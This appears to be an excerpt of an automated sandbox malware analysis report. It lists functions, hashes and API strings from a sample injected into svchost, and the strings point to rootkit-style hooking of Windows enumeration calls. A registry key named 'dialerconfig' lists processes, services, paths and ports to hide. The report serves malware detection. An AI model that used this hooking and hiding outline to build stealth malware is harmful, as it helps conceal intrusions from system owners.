                                                                                                                                                                                            Function 00007FFAAC2565C8 Relevance: .6, Instructions: 643COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1671800821.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac250000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 20e4a24a02f58b1dcca8d6932d99ac740378ff4eedd2c1a0f7bf130672e1ee7f
                                                                                                                                                                                            • Instruction ID: 98b41d10952997f1f84959664133e25b9713a9c41a4f5443855bd80dc1d8a204
                                                                                                                                                                                            • Opcode Fuzzy Hash: 20e4a24a02f58b1dcca8d6932d99ac740378ff4eedd2c1a0f7bf130672e1ee7f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E227270A19A5ACFEB98EB18C495AA977E1FF59300F1081B9C40DD7396DE34EC46CB81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:0.7%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                            Total number of Nodes:74
                                                                                                                                                                                            Total number of Limit Nodes:2
                                                                                                                                                                                            execution_graph 14912 142db40273c 14914 142db40276a 14912->14914 14913 142db402858 LoadLibraryA 14913->14914 14914->14913 14915 142db4028d4 14914->14915 14916 142db141abc 14921 142db141628 GetProcessHeap 14916->14921 14918 142db141ad2 Sleep SleepEx 14919 142db141acb 14918->14919 14919->14918 14920 142db141598 StrCmpIW StrCmpW 14919->14920 14920->14919 14922 142db141648 _invalid_parameter_noinfo 14921->14922 14966 142db141268 GetProcessHeap 14922->14966 14924 142db141650 14925 142db141268 2 API calls 14924->14925 14926 142db141661 14925->14926 14927 142db141268 2 API calls 14926->14927 14928 142db14166a 14927->14928 14929 142db141268 2 API calls 14928->14929 14930 142db141673 14929->14930 14931 142db14168e RegOpenKeyExW 14930->14931 14932 142db1418a6 14931->14932 14933 142db1416c0 RegOpenKeyExW 14931->14933 14932->14919 14934 142db1416e9 14933->14934 14935 142db1416ff RegOpenKeyExW 14933->14935 14970 142db1412bc RegQueryInfoKeyW 14934->14970 14936 142db141723 14935->14936 14937 142db14173a RegOpenKeyExW 14935->14937 14981 142db14104c RegQueryInfoKeyW 14936->14981 14940 142db141775 RegOpenKeyExW 14937->14940 14941 142db14175e 14937->14941 14945 142db141799 14940->14945 14946 142db1417b0 RegOpenKeyExW 14940->14946 14944 142db1412bc 13 API calls 14941->14944 14947 142db14176b RegCloseKey 14944->14947 14948 142db1412bc 13 API calls 14945->14948 14949 142db1417d4 14946->14949 14950 142db1417eb RegOpenKeyExW 14946->14950 14947->14940 14953 142db1417a6 RegCloseKey 14948->14953 14954 142db1412bc 13 API calls 14949->14954 14951 142db141826 RegOpenKeyExW 14950->14951 14952 142db14180f 14950->14952 14956 142db141861 RegOpenKeyExW 14951->14956 14957 142db14184a 14951->14957 14955 142db14104c 5 API calls 14952->14955 14953->14946 14958 142db1417e1 RegCloseKey 14954->14958 14959 142db14181c RegCloseKey 14955->14959 14961 142db141885 14956->14961 14962 142db14189c RegCloseKey 14956->14962 14960 142db14104c 5 API calls 14957->14960 14958->14950 14959->14951 14963 142db141857 RegCloseKey 14960->14963 14964 142db14104c 5 API calls 14961->14964 14962->14932 14963->14956 14965 142db141892 RegCloseKey 14964->14965 14965->14962 14987 142db156168 14966->14987 14968 142db141283 GetProcessHeap 14969 142db1412ae _invalid_parameter_noinfo 14968->14969 14969->14924 14971 142db141327 GetProcessHeap 14970->14971 14972 142db14148a RegCloseKey 14970->14972 14975 142db14133e _invalid_parameter_noinfo 14971->14975 14972->14935 14973 142db141476 GetProcessHeap HeapFree 14973->14972 14974 142db141352 RegEnumValueW 14974->14975 14975->14973 14975->14974 14977 142db1413d3 GetProcessHeap 14975->14977 14978 142db14141e lstrlenW GetProcessHeap 14975->14978 14979 142db1413f3 GetProcessHeap HeapFree 14975->14979 14980 142db141443 StrCpyW 14975->14980 14989 142db14152c 14975->14989 14977->14975 14978->14975 14979->14978 14980->14975 14982 142db1411b5 RegCloseKey 14981->14982 14983 142db1410bf _invalid_parameter_noinfo 14981->14983 14982->14937 14983->14982 14984 142db1410cf RegEnumValueW 14983->14984 14985 142db14114e GetProcessHeap 14983->14985 14986 142db14116e GetProcessHeap HeapFree 14983->14986 14984->14983 14985->14983 14986->14983 14988 142db156177 14987->14988 14992 142db141546 14989->14992 14993 142db14157c 14989->14993 14990 142db141565 StrCmpW 14990->14992 14991 142db14155d StrCmpIW 14991->14992 14992->14990 14992->14991 14992->14993 14993->14975

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 00000142DB14328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1683269324-0
                                                                                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                            • Instruction ID: 6b34417ba078440be6a0c509564850abb85ef84c6dcedc668db6a142cd9e4835
                                                                                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F116D70E1064582FB609BE1F839BD92EA4AB5C745FD04138F946835BDEF78C6D8C250
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB141ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: GetProcessHeap.KERNEL32 ref: 00000142DB141633
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: HeapAlloc.KERNEL32 ref: 00000142DB141642
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB1416B2
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB1416DF
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB1416F9
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB141719
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB141734
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB141754
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB14176F
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB14178F
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB1417AA
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB1417CA
                                                                                                                                                                                            • Sleep.KERNEL32 ref: 00000142DB141AD7
                                                                                                                                                                                            • SleepEx.KERNEL32 ref: 00000142DB141ADD
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB1417E5
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB141805
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB141820
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB141840
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB14185B
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegOpenKeyExW.ADVAPI32 ref: 00000142DB14187B
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB141896
                                                                                                                                                                                              • Part of subcall function 00000142DB141628: RegCloseKey.ADVAPI32 ref: 00000142DB1418A0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1534210851-0
                                                                                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                            • Instruction ID: 17607e0714009d503e9f9988396d7c9146de5d240accb8be2458799f43b74b23
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0031CA71A1064182FB509BA6DA613E92FB5AB8DFC0F945421FE09876BDFE74C8F1C210
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB40273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                            • Instruction ID: c05ce9976b898d6c4cd1d28f1bc239f30e3d25da785af6d8ff6d57e4889bbea8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: B3612236F0169487DB54CF95D030BADBBA2FB54BA5FA88121EF59037D8DA38D892C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 00000142DB142B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 363 142db142b2c-142db142ba5 call 142db162ce0 366 142db142ee0-142db142f03 363->366 367 142db142bab-142db142bb1 363->367 367->366 368 142db142bb7-142db142bba 367->368 368->366 369 142db142bc0-142db142bc3 368->369 369->366 370 142db142bc9-142db142bd9 GetModuleHandleA 369->370 371 142db142bdb-142db142beb call 142db156090 370->371 372 142db142bed 370->372 374 142db142bf0-142db142c0e 371->374 372->374 374->366 377 142db142c14-142db142c33 StrCmpNIW 374->377 377->366 378 142db142c39-142db142c3d 377->378 378->366 379 142db142c43-142db142c4d 378->379 379->366 380 142db142c53-142db142c5a 379->380 380->366 381 142db142c60-142db142c73 380->381 382 142db142c83 381->382 383 142db142c75-142db142c81 381->383 384 142db142c86-142db142c8a 382->384 383->384 385 142db142c9a 384->385 386 142db142c8c-142db142c98 384->386 387 142db142c9d-142db142ca7 385->387 386->387 388 142db142d9d-142db142da1 387->388 389 142db142cad-142db142cb0 387->389 390 142db142da7-142db142daa 388->390 391 142db142ed2-142db142eda 388->391 392 142db142cc2-142db142ccc 389->392 393 142db142cb2-142db142cbf call 142db14199c 389->393 394 142db142dbb-142db142dc5 390->394 395 142db142dac-142db142db8 call 142db14199c 390->395 391->366 391->381 397 142db142cce-142db142cdb 392->397 398 142db142d00-142db142d0a 392->398 393->392 402 142db142dc7-142db142dd4 394->402 403 142db142df5-142db142df8 394->403 395->394 397->398 405 142db142cdd-142db142cea 397->405 399 142db142d3a-142db142d3d 398->399 400 142db142d0c-142db142d19 398->400 407 142db142d3f-142db142d49 call 142db141bbc 399->407 408 142db142d4b-142db142d58 lstrlenW 399->408 400->399 406 142db142d1b-142db142d28 400->406 402->403 410 142db142dd6-142db142de3 402->410 411 142db142e05-142db142e12 lstrlenW 403->411 412 142db142dfa-142db142e03 call 142db141bbc 403->412 413 142db142ced-142db142cf3 405->413 416 142db142d2b-142db142d31 406->416 407->408 423 142db142d93-142db142d98 407->423 418 142db142d5a-142db142d64 408->418 419 142db142d7b-142db142d8d call 142db143844 408->419 420 142db142de6-142db142dec 410->420 414 142db142e14-142db142e1e 411->414 415 142db142e35-142db142e3f call 142db143844 411->415 412->411 431 142db142e4a-142db142e55 412->431 422 142db142cf9-142db142cfe 413->422 413->423 414->415 424 142db142e20-142db142e33 call 142db14152c 414->424 425 142db142e42-142db142e44 415->425 416->423 426 142db142d33-142db142d38 416->426 418->419 429 142db142d66-142db142d79 call 142db14152c 418->429 419->423 419->425 430 142db142dee-142db142df3 420->430 420->431 422->398 422->413 423->425 424->415 424->431 425->391 425->431 426->399 426->416 429->419 429->423 430->403 430->420 436 142db142e57-142db142e5b 431->436 437 142db142ecc-142db142ed0 431->437 441 142db142e63-142db142e7d call 142db1485c0 436->441 442 142db142e5d-142db142e61 436->442 437->391 444 142db142e80-142db142e83 441->444 442->441 442->444 447 142db142ea6-142db142ea9 444->447 448 142db142e85-142db142ea3 call 142db1485c0 444->448 447->437 450 142db142eab-142db142ec9 call 142db1485c0 447->450 448->447 450->437
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                            • Instruction ID: f82c50f69d5d26e36f9e9601ae0c6b92020fc20dc5d7ac3950a25c133c1a9529
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                            • Instruction Fuzzy Hash: F5B19472A20A9082EB648FE5D5607E96BA5FB48B94F845026FE09577BCDF34CCC4C780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB147D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                            • Instruction ID: ed59bda030810489635d49ead19d387d5b5c0aa21b125c4576020fa37d499fe3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                            • Instruction Fuzzy Hash: EE316576615B8089EB609FA0E8507ED77B4F788744F844529EB4D57BA8EF38C688C710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                            • Instruction ID: a05bb65b0b1f5f66d8d499a31ba402dd1f3f198a25f989f3a649c5cff47e54f1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: B9317E36614B8086EB60CF65E8503DE77A0F789754F900126FA9D43BA8DF38C686CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB147960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                            • Instruction ID: 1f920cf291497cfb63f2d941aabaad4205c78c8213427795c433e623f9a01c96
                                                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E11EF36B10B4589EF408BB0E8653A837B4F75D759F841E25EA6D477A8DF78C1A48380
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                                                            • Instruction ID: cafc507478e48e00b68f7de8c98f9799b2c2d2aaac3ede3ed9f8cc9397e6f3bb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5051A632B0079089FB209BB2A8547DE7FA5F749B98F944125FE5867BADDB38C581C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14F830 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                            • Opcode ID: 3a74cfd470538558c8c26451ce8f33b7d3d65cb1e3ef09f26fba14c55d1f06f1
                                                                                                                                                                                            • Instruction ID: 994a94430dfd43386d482c2eab614e8c960d36c4fb81234558afadc46f0dfaaf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a74cfd470538558c8c26451ce8f33b7d3d65cb1e3ef09f26fba14c55d1f06f1
                                                                                                                                                                                            • Instruction Fuzzy Hash: C2B09234E03A45C2EA082BA16C9634826E8BB8C702FE48028D00C42334DA3C85E54780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB1542F0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                                                            • Instruction ID: a54d59c59cb1d17664fdfc72e3af89d3cc9bc1631498fea3a029139406fbd1f2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F01871B156948FDBA48F79A4527597BE0F34C3C4FD48119E58983B18D63CC4918F44
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB141628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                            • Instruction ID: 1e1f514f7e255df1a5d4e08e956ec218ee86d0b19e85537d110ef333f8620d43
                                                                                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                            • Instruction Fuzzy Hash: FA71EB36B10A5186EB109FA6E8A1BDD2BB4F788B98F801111EE4E57B7DEF34C494C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB1412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                            • Instruction ID: d29138fc136ff00e03d9c2fab726d96dee23fb640036abc2b7c4df96a1045418
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                            • Instruction Fuzzy Hash: EF513C36A00B84C6EB54CFA2E5583AA7BE1F78DB95F844124EA4907B68DF3CC595C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB141D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                            • Instruction ID: cc0561d7420fa04eef7874ef2a9d17f5c683423295cbe4a66a808c9b0cb0feb9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 50315F74E1098AA1EA05EBE6E871BD46B61AB0D384FC05413F85A0357DAE78C6DEC390
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB406910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
